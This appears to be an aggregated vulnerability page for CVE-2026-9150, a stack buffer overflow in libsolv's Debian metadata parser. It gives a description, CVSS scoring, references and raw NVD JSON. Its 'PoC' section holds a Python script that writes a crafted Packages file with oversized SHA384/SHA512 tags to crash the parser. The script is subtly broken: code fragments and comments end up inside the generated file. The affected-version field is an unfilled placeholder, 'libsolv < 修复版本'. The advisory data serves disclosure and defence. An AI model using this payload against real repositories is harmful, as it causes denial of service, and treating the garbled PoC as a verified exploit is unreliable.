CVE-2026-9150

Description

A flaw was found in libsolv. This stack-based buffer overflow vulnerability occurs in libsolv's Debian metadata parser when processing specially crafted Debian repository metadata. An attacker could exploit this by providing malicious SHA384 or SHA512 checksum tags, leading to memory corruption and a denial of service (DoS) in the affected system.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

libsolv < 修复版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import os

# Simulate creating a malicious Debian metadata file with oversized checksum tags
malicious_metadata = """
Package: fake-package
Version: 1.0.0
Filename: pool/main/f/fake-package.deb
SHA384: {} + 'A'*500 # Excessive length to trigger overflow
SHA512: {} + 'B'*500 # Excessive length to trigger overflow
""".format('A'*500, 'B'*500)

with open('malicious_Packages', 'w') as f:
    f.write(malicious_metadata)

print("Malicious metadata file generated.")
# In a real scenario, this file would be hosted on a repository parsed by libsolv.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-9150
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-9150
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-9150/
[4] VulDB https://vuldb.com/cve/CVE-2026-9150
[5] https://access.redhat.com/security/cve/CVE-2026-9150
[6] https://bugzilla.redhat.com/show_bug.cgi?id=2460379
[7] https://github.com/openSUSE/libsolv/pull/616

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-9150", "sourceIdentifier": "[email protected]", "published": "2026-05-20T23:16:36.010", "lastModified": "2026-05-20T23:16:36.010", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in libsolv. This stack-based buffer overflow vulnerability occurs in libsolv's Debian metadata parser when processing specially crafted Debian repository metadata. An attacker could exploit this by providing malicious SHA384 or SHA512 checksum tags, leading to memory corruption and a denial of service (DoS) in the affected system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-121"}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-9150", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460379", "source": "[email protected]"}, {"url": "https://github.com/openSUSE/libsolv/pull/616", "source": "[email protected]"}]}}